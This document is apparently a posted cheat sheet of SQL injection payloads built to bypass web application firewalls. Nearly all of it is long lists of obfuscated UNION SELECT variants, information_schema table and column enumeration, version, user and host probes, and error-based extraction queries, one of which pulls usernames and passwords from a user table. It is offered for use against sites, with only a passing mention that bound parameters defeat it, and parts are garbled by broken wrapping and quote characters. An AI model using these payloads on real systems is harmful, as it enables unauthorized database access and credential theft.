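This is for those who already know SQL injection. Sometimes there will be a 403 Forbidden error or a Not Acceptable error; this is because of the WAF (web application firewall). Every variant below targets keyword and pattern matching in the WAF; a query built with bound parameters never parses these strings as SQL, whatever the encoding. You can bypass the WAF by using the following queries. If you don't know SQL injection you can learn it HERE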
Union Select :
union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0)) /*!50000union*/+/*!50000select*/ UNIunionON+SELselectECT +union+distinct+select+ +union+distinctROW+select+ union+/*!select*/+1,2,3 union/**/select/**/1,2,3 uni%20union%20/*!select*/%20 /**//*!union*//**//*!select*//**/ union%23aa%0Aselect /**/union/*!50000select*/ /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ id=1+’UnI”On’+'SeL”ECT’ <-MySQL only id=1+'UnI'||'on'+SeLeCT' <-MSSQL only /*!50000%55nIoN*/ /*!50000%53eLeCt*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt+ +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ uNiOn aLl sElEcT UNIunionON+SELselectECT /**/union/*!50000select*//**/ 0%a0union%a0select%09 %0Aunion%0Aselect%0A %55nion/**/%53elect uni<on all sel<ect /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ %0A%09UNION%0CSELECT%10NULL% /*!union*//*--*//*!all*//*--*//*!select*/ union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ +UnIoN/*&a=*/SeLeCT/*&a=*/ union+sel%0bect +uni*on+sel*ect+ +#1q%0Aunion all#qa%0A#%0Aselect union(select (1),(2),(3),(4),(5)) UNION(SELECT(column)FROM(table)) %23xyz%0AUnIOn%23xyz%0ASeLecT+ %23xyz%0A%55nIOn%23xyz%0A%53eLecT+ union(select(1),2,3) union (select 1111,2222,3333) uNioN 
(/*!/**/ SeleCT */ 11) union (select 1111,2222,3333) +#1q%0AuNiOn all#qa%0A#%0AsEleCt UNION/*&test=1*/SELECT/*&pwn=2*/ un?<ion sel&ect +un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+ /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/ %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+ /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/ /union\sselect/g /union\s+select/i /*!UnIoN*/SeLeCT +UnIoN/*&a=*/SeLeCT/*&a=*/ +uni>on+sel>ect+ +(UnIoN)+(SelECT)+ +(UnI)(oN)+(SeL)(EcT) +’UnI”On’+'SeL”ECT’ +uni on+sel ect+ +/*!UnIoN*/+/*!SeLeCt*/+ /*!u%6eion*/ /*!se%6cect*/ uni%20union%20/*!select*/%20 union%23aa%0Aselect /**/union/*!50000select*/ /^.*union.*$/ /^.*select.*$/ /*union*/union/*select*/select+ /*uni X on*/union/*sel X ect*/ +un/**/ion+sel/**/ect+ +UnIOn%0d%0aSeleCt%0d%0a
Buffer Overflow
+And(select 1)=(select 0×414)+union+select+1– +And(select 1)=(select 0xAAAA)+union+select+1– +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141)+ +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
400 Bad Request
–+%0A union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
Group_Concat
Group_Concat() /*!group_concat*/() grOUp_ConCat(/*!*/,0x3e,/*!*/) group_concat(,0x3c62723e) g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~%22%29 CoNcAt() CONCAT(DISTINCT Version()) concat(,0x3a,) concat() CoNcAt() /*!50000cOnCat*/(/*!Version()*/) /*!50000cOnCat*/ /**//*!12345cOnCat*/(,0x3a,) concat_ws() concat(0x3a,,0x3c62723e) /*!concat_ws(0x3a,)*/ concat_ws(0x3a3a3a,version() CONCAT_WS(CHAR(32,58,32),version(),) REVERSE(tacnoc) binary(version()) uncompress(compress(version())) aes_decrypt(aes_encrypt(version(),1),1)
To make the column number appear in the page, put after id
id=1+and+1=0+union+select+1,2,3,4,5,6 +AND+1=0 /*!aND*/ 1 like 0 +/*!and*/+1=0 +and+2>3+ +and(1)=(0) and (1)!=(0) +div+0 Having+1=0
Tables
group_concat(/*!table_name*/) +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– - /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– - /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
Columns
group_concat(/*!column_name*/) +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table /*!froM*/ table– -
Function Bypassing
unhex(hex(value)) cast(value as char) uncompress(compress(version())) cast(version() as char) aes_decrypt(aes_encrypt(version(),1),1) binary(version()) convert(value using ascii)
Avoid Source Page Injection
concat(? >,<br><br><br>,@@version,?<img src= ,?<? #) ><br>? <img src= <img src= />injection<img src= concat(0x223e,@@version)concat(0x273e27,version(),0x3c212d2d)concat(0x223e3c62723e,version(),0x3c696d67207372633d22)concat(0x223e,@@version,0x3c696d67207372633d22)concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)concat(0x223e3c62723e,@@version,0x3a, BlackRose ,0x3c696d67207372633d22)concat( </title> ,@@version, <title> )concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
Get Version - DB_NAME - User - HOST_NAME - DataDir
version() convert(version() using latin1) unhex(hex(version())) @@GLOBAL.VERSION (substr(@@version,1,1)=5) :: 1 true 0 fals # like # http://localhost/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 – +and substring(version(),1,1)=4 +and substring(version(),1,1)=5 +and substring(version(),1,1)=9 +and substring(version(),1,1)=10 id=1 /*!50094aaaa*/ error id=1 /*!50095aaaa*/ no error id=1 /*!50096aaaa*/ error # like # http://localhost/page.php?id=13 /*!50095aaaa*/ id=1 /*!40123 1=1*/–+- no error id=1 /*!40122rrrr*/ no error # like # http://localhost/page.php?id=13 /*!40122rrrr*/ error not v4
DB_NAME
@@database database() id=vv() # like # http://localhost/page.php?id=-13 union select 1,2,DB_NAME(),4,5 – http://localhost/page.php?id=vv%28%29 @@user user() user_name() system_user() # like # http://localhost/page.php?id=-13 union select 1,2,user(),4,5 – HOST_NAME() @@hostname @@servername SERVERPROPERTY() # like # http://localhost/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 – @@datadir datadir() # like # http://localhost/page.php?id=-13 union select 1,2,datadir(),4,5 – ASPX and 1=0/@@version ‘ and 1=0/@@version;– ‘) and 1=@@version– and 1=0/user;–
Error Based
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1– or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150) from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– - or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — - and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))) +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x or 1=convert(int,(@@version))- +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1– +and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+-